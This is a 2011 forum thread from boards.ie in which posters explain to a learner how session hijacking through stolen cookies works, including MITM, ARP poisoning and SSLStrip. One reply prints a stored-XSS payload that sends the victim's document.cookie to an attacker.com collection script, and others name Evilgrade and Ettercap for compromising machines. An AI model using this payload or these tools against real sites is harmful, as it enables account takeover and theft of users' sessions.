Advertisement
If you have a new account but are having problems posting or verifying your account, please email us on hello@boards.ie for help. Thanks :)
Hello all! Please ensure that you are posting a new thread or question in the appropriate forum. The Feedback forum is overwhelmed with questions that are having to be moved elsewhere. If you need help to verify your account contact hello@boards.ie
Hi there,
There is an issue with role permissions that is being worked on at the moment.
If you are having trouble with access or permissions on regional forums please post here to get access: https://www.boards.ie/discussion/2058365403/you-do-not-have-permission-for-that#latest

session hijacking and cookies

  • 07-06-2011 8:14pm
    #1
    Closed Accounts Posts: 292 ✭✭


    in session hijacking are the cookies unencrypted if the connection to router is encrypted? also if one steals the cookie does the original person still have to be logged in before the hijacker can log in? And where does the hijacker use the stolen cookie to log in?

    does hijacker have to be on same lan? In an internet cafe everyone is on the same lan? I am interested in network security hence these questions


Comments

  • Closed Accounts Posts: 5,082 ✭✭✭Pygmalion


    Resend wrote: »
    in session hijacking are the cookies unencrypted if the connection to router is encrypted?

    Yes, unless the user is connecting to the site securely; sites such as Paypal will only accept secure connections, sites like Facebook and Twitter have the option of enforcing it.
    also if one steals the cookie does the original person still have to be logged in before the hijacker can log in?
    Yeah, generally once the user logs out their cookies are useless.
    And where does the hijacker use the stolen cookie to log in?
    The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
    There are plenty of extenstions and stuff for browsers that let you set/change them, generally when you steal one you'd use one of these.
    does hijacker have to be on same lan?
    You need to be able to capture the information they send.
    Generally (almost always) this occurs when two people are on the same unsecured wireless network.
    In an internet cafe everyone is on the same lan?
    Yes but generally wired networks aren't as vulnerable.
    It's possible someone could steal traffic by taking over the router or through something like ARP Poisoning, but this would be rare, and generally internet cafés would be aware of these risks and take precautions.

    If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P


  • Closed Accounts Posts: 292 ✭✭Resend


    Thanks
    Pygmalion wrote: »
    The browser stores it and sends it each time it wants to get a page (until the session ends, by logging out or closing the browser).
    There are plenty of extenstions and stuff for browsers that let you set/change them, generally when you steal one you'd use one of these.

    i do not understand this part.Imagine:-
    Insecure lan
    A is logged in to anysite.com
    B steals his cookie
    where does B enter the cookie when browsing to anysite.com to be able to impersonate A
    If I got anything wrong or left anything out I'm sure someone will jump in and reprimand correct me :P
    i would say you won't have long to wait:D


  • Registered Users, Registered Users 2 Posts: 8,813 ✭✭✭BaconZombie


    OP, have a read of this first:

    http://cscis12.dce.harvard.edu/lecture_notes/2009/20090721/handout.html

    The section on Cookies starts on slide 34.

    K8Fny.png


  • Registered Users, Registered Users 2 Posts: 1,691 ✭✭✭JimmyCrackCorn


    SSL:

    As an addition SSL is not guaranteed to be safe.

    Man in the middle attacks do work on SSL. There are tools that strip certificates.

    Also accepting a bad certificate or regestering a bad certificate voids SSLs protection.

    I'm currently playing with a piece of code to hook winsock functions including Calls used to send and receive Data using ssl making it ineffective. (I'm messing with rootkits and other stuff )


    So what I'm saying is there's more than one way to skin a cat.


    Do I have to be on the local network?

    No Scenario 1

    I compromised your router a month ago and have it pointing at my evil DNS server. I can re-direct your traffic wherever I want.

    Scenario 2:

    Iv compromised your PC and have remote access. Your screwed.



    So it can get complicated quickly but as you can see no simple answers.


  • Closed Accounts Posts: 20,759 ✭✭✭✭dlofnep


    SSLStrip is used for SSL connections. I wrote a small paper demonstrating it with an ARP MITM attack.

    As for hijacking - you don't have to be on the same lan. It can be accomplished a number of ways. One is through XSS, where a script on a remote server is executed, with a parameter passed with the value of document.cookie().

    An example might look as follows.

    Attacker inserts stored XSS, which silently executes the following when unbeknownst to the victim, loads the page.
    <script>new Image().src="http://attacker.com/steal.php?value="+encodeURI(document.cookie);</script>
    

    On the attacker's side, they will need a script that reads the passed value, and then store it to either a flat-file, or database.

    If you download mutillidae (a web-hacking testbed), you can practice on that.


  • Advertisement
  • Closed Accounts Posts: 452 ✭✭Phractal


    Over a LAN probably the single most amazing tool I have used is Evilgrade. Takes f*cking AGES to make it work, but once it does work, you can have most any box pwned in moments thanks to basic social engineering and insecure update mechanisms.

    As for MITM, cookie stealing is a big enough threat, but simply sitting there and MITM-ing you is FAR easier with Ettercap and SslStrip...


Advertisement